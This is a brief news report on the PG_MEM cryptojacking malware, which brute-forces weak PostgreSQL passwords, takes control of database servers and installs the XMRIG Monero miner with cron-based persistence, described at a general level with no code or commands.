Researchers at Aqua Nautilus have identified a new malware targeting PostgreSQL servers to deploy cryptocurrency miners.
The cybersecurity firm has flagged over 800,000 servers as potentially vulnerable to a cryptojacking campaign focusing on PostgreSQL, an open-source relational database management system used to store, manage, and retrieve data for various applications.
According to a research report, the malware, dubbed βPG_MEM,β initiates a brute force attack to gain access to PostgreSQL databases with weak passwords. Upon infiltrating the system, it establishes a superuser role with administrative privileges, taking full control of the database and blocking access for other users. This control allows the malware to execute shell commands on the host system, facilitating the download and deployment of additional malicious payloads.
The payloads include two files designed to evade detection, set up the system for cryptocurrency mining, and deploy the XMRIG mining tool used to mine Monero. XMRIG is frequently used by threat actors due to Moneroβs hard-to-trace transactions.
Last year, an educational platform was compromised in a cryptojacking campaign where attackers deployed a hidden script that installed XMRIG on every visitorβs system.
Analysts found that the malware removes existing cron jobs, which are scheduled tasks that run automatically at specified intervals on a server, and creates new ones to ensure that the crypto miner continues to run. This allows the malware to persist even if the server is restarted or if some processes are temporarily stopped. To remain unnoticed, the malware deletes specific files and logs that could be used to track or identify its activities on the server.
The researchers warned that while the primary goal of the campaign is to deploy the cryptocurrency miner, attackers also gain control of the affected server, underscoring the severity of the threat.
Cryptojacking campaigns targeting PostgreSQL databases have been a recurring threat over the years. In 2020, researchers uncovered a similar cryptojacking campaign involving the PgMiner botnet. In 2018, the StickyDB botnet was discovered, which also infiltrated servers to mine Monero.
Stay informed and explore more news on cryptocurrency, investing, and finance on Global Crypto News.